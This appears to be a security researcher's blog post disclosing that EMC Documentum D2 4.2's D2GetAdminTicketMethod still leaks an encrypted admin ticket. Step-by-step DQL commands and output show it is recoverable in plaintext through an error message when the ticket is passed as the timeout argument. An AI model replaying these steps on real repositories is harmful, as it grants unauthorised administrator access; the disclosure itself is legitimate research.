God bless EMC. Part IV

Previously I had written about security vulnerability in D2’s D2GetAdminTicketMethod method, starting from 4.2 release EMC have changed behavior of D2 methods – now D2 encrypts method arguments and return value passed through c6_method_return object:

1> create c6_method_return object set message='test'
2> go
object_created
----------------
00002f0a8000291d
(1 row affected)
1> execute do_method with method='D2GetAdminTicketMethod',
2> arguments='-docbase_name d242 -password "" -method_return_id 00002f0a8000291d
3> -scope global -timeout 3600'
4> go
...
(1 row affected)
1> select message from c6_method_return where r_object_id='00002f0a8000291d'
2> go
message
----------------------------------------------------------------------------
AAAAEMm1Ypog8dNWsELGoge38HRKVIUnN4/vw4rmz8xJ7EcZuOaQ8rT6vAktbc8g5qV07pme7nt2
hG4D+ljeR2G5JCystXA8JDDaxmM5xjNfwshe9YldFZBlSinYBvFdigpuZCmTFES+n1b5ZbVC/L7b
aZ7UI1LI06YhJvRcVjB9mzwMENk8H7KaxDXiFBCEQSiNNn5DoXwjZPWLJd9WTdXIlXpPzWAR2KG+
44/DdBkvmi6A5v7+wF5+b0wR3saQFhxTX7Rfu/vVVFfvEehYAJNvDAvd/vtWvpJa+6N3Zmz+SZgH
q6x59int5a8CmSXhrZiflwcs+psMaOcStVyY/lYZGrGMdY4y9eEqn1psnQ+azA0cmfRZfn7uJJbc
KJmARVgaPFZN4FbEdbeu94PrNUU/lQrtKs+NaiwColY/WYEY8MlzkZhQ249koCHqgd07/TLdAX6l
9xCtvyIJf7cQeSi/4Xl4NlQ92O5RRFwPxIdHz0dhwSxnVptqGoRqMTcpw/NTJ5ldA5ZrhRnudAhi
iUt2b3PP0UBjVUjnpA9QD5sLR2DxUX4ysUbI2MDoYlzcnL5MYWLvEqq3K6gPXA8YJAgUwIIYbDqo
rXZEtet2cAl5zKCgDAqL6AqIPzcFn1sIDqy6p72D1kvQF4iFs2oQJZAT55j+C6SGcm4DoJYskpGg
/AwBiE0YFQX2zqjwqbSPcGSoIZDmoPZFELGjySl0xxjWcwW5HXh7194j73FW2FV82cMNZVIyf2/f
gWRMt+rw315VhwORReJYfMhibTBHR+CC+ySOetT7xvEMBVarfEOUHqGvs9hLZWYhgpBa2EgBKUZQ
jFBRe2SmK1E0aR7hmS1zbdATDJJGNhP9PrDLaHelunjgawEoAoMilY51EPgwqI2MuA==
(1 row affected)

So, now we are getting some garbage instead of ticket.

Is it possible to decrypt that garbage?
YES! Note how encrypted password is passed as integer argument (timeout) and D2 says that it’s not an integer:

1> update c6_method_return object
2> set parameter_name[0]='-timeout',
3> set parameter_value[0]=(select message from c6_method_return
4> where r_object_id='00002f0a8000291d')
5> where r_object_id='00002f0a8000291d'
6> go
objects_updated
---------------
              1
(1 row affected)
[DM_QUERY_I_NUM_UPDATE]info:  "1 objects were affected by your UPDATE statement."

1> execute do_method with method='D2GetAdminTicketMethod',
2> arguments='-docbase_name d242 -password "" -method_return_id 00002f0a8000291d
3> -scope global'
4> go
...
(1 row affected)

1> select error from c6_method_return where r_object_id='00002f0a8000291d'
2> go
error
----------------------------------------------------------------------------
For input string: "DM_TICKET=T0JKIE5VTEwgMAoxMwp2ZXJzaW9uIElOVCBTIDAKMwpmbGFncyBJTlQ
(1 row affected)

4 thoughts on “God bless EMC. Part IV

  1. Pingback: documentum security vulnerabilities: more deep dive in D2 | Documentum in a (nuts)HELL
  2. Pingback: Is it worth to treat flu if patient has cancer? | Documentum in a (nuts)HELL
  3. Pingback: CVE-2014-2515 (D2GetAdminTicketMethod). Was it really fixed? | Documentum in a (nuts)HELL
  4. Pingback: Say goodbuy LockBox. Part II | Documentum in a (nuts)HELL

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s